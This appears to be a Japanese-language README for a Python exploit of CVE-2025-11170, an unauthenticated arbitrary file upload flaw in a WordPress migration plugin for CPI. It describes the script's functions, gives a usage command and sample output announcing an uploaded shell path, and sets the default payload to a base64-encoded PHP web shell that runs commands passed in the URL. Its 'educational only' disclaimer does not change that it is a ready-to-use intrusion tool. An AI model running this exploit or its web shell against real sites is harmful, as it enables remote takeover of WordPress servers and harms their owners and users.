
WP移行専用プラグイン for CPI <= 1.0.2 - Unauthenticated Arbitrary File Upload
WP移行専用プラグイン for CPI <= 1.0.2 - 認証なし任意ファイルアップロード
WordPress用プラグイン WP移行専用プラグイン for CPI は、Cpiwm_Import_Controller::import 関数におけるファイルタイプ検証の欠如により、1.0.2 を含む全バージョンで任意ファイルアップロードの脆弱性があります。
これにより、認証されていない攻撃者が影響を受けるサイトのサーバーに任意のファイルをアップロードでき、リモートコード実行につながる可能性があります。
CVE-2025-11170.pyNxploited_parse_args
入力引数を解析・検証します。正しいエンドポイント構造、ヘッダー、データエンコーディングを保証します。
Nxploited_logging
詳細または最小限の実行時出力のための高度なロギングと冗長性を設定します。
Nxploited_retry_session
耐障害性のある通信のために、リトライとバックオフロジックを備えた永続セッションを初期化します。
Nxploited_build_payload
エクスプロイト用のPOSTリクエストパラメータを構築します。
Nxploited_send
脆弱性のあるエンドポイントへの実際のPOSTリクエストを実行し、レスポンス/エラーを処理します。
Nxploited_output_result
レスポンスを処理・整形し、成功時にはシェルのパスを、それ以外の場合はデバッグ情報を表示します。
python3 CVE-2025-11170.py -u "http://192.168.100.74:888/wordpress/" -f "shell.php"
出力例:
Uploading shell...
Processing response...
[+] Upload successful!
Shell path:
http://192.168.100.74:888/wordpress/wp-content/plugins/cpi-wp-migration/storage/shell.php
Nxploited
My GitHub: https://github.com/Nxploited
このスクリプトは教育目的のみで提供されています。
許可なくターゲットに対してこのエクスプロイトを使用することは違法となる場合があります。
作者は、誤用、損害、または法的結果について一切の責任を負いません。
GitHub: Nxploited
Telegram: KNxploited
作者: Nxploited ( Khaled Alenazi )
| 引数 | 説明 |
|---|
-u, --url | ベースターゲットURL(例: http://target.com/wordpress/)。スクリプトは wp-admin/admin-ajax.php を自動的に追加します。 |
-f, --filename | アップロードするシェルまたはファイル名。デフォルト: shell.php |
-d, --data | base64(または生テキスト)で指定するファイルの内容。デフォルト: PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+ |
-i, --index | インデックスフィールドの値。デフォルト: 0 |
-H, --headers | 追加のHTTPヘッダー(形式: X-Key:Value;K2:Value2) |
-t, --timeout | HTTPリクエストのタイムアウト(秒)。デフォルト: 10 |
--retries | リトライ回数。デフォルト: 3 |
--backoff | リトライ間のバックオフ係数(秒)。デフォルト: 0.7 |
-v, --verbose | デバッグ用の冗長性を上げる(繰り返し指定可能) |